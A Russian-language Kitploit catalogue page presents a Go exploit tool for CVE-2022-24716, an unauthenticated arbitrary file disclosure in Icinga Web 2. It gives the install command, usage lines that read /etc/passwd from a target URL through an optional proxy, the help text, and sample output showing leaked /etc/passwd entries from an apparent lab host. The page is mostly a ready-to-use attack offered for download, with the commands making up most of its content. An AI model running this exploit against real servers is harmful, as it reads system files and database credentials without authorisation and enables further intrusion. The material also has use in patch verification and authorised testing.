Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-24716-2 — CVE-2022-24716 (Произвольное раскрытие файлов Icingaweb2) | Kitploit
Инструменты/GitHubGitHub/gmh5225/cve-2022-24716-2
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubgmh5225/cve-2022-24716-2

CVE-2022-24716-2

CVE-2022-24716 (Произвольное раскрытие файлов Icingaweb2)

Репозиторий
12 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-24716

Icinga Web 2 — это веб-интерфейс, фреймворк и интерфейс командной строки для мониторинга с открытым исходным кодом. Неаутентифицированные пользователи могут раскрыть содержимое доступных пользователю локальных системных файлов с веб-сервера, включая файлы конфигурации icingaweb2 с учетными данными базы данных.

  • Установка
  • Использование
  • Запуск CVE-2022-24716

Установка

Для CVE-2022-24716 требуется golang; чтобы загрузить его, просто используйте:

root@kitploit:~
go install -v github.com/joaoviictorti/CVE-2022-24716@latest

Использование

root@kitploit:~
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd 
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080

Это покажет справку по инструменту. Вот все параметры, которые он поддерживает:

root@kitploit:~
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
                      [-p|--proxy "<value>"]

                      CVE-2022-24716 - Arbitrary File Disclosure

Arguments:

  -h  --help   Print help information
  -u  --url    Insert url
  -f  --file   Insert file
  -p  --proxy  Insert proxy

Запуск CVE-2022-24716

root@kitploit:~
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd  

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......
Скачать инструмент